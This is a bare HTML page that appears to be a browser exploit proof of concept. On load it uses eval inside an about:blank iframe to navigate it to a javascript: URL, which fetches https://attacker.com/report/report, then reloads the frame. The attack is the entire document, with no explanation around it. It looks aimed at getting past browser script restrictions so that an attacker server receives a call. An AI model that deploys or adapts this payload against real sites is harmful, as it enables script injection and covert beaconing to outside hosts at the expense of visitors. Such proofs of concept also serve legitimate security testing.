<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGdFLFgGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGdFLFgGGGGG.onload=_=>GGGGGdFLFgGGGGG.contentWindow.eval("location='javascript:fetch(`https://attacker.com/report/report`)'");GGGGGdFLFgGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>